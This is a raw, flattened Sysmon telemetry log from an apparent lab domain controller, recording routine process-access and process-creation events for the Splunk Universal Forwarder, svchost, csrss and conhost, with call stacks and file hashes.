10341000x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.575{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8EE4-6005-C100-00000000A301}28722244C:\Windows\system32\cmd.exe{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.563{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.546{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.546{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE4-6005-C100-00000000A301}2872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program 
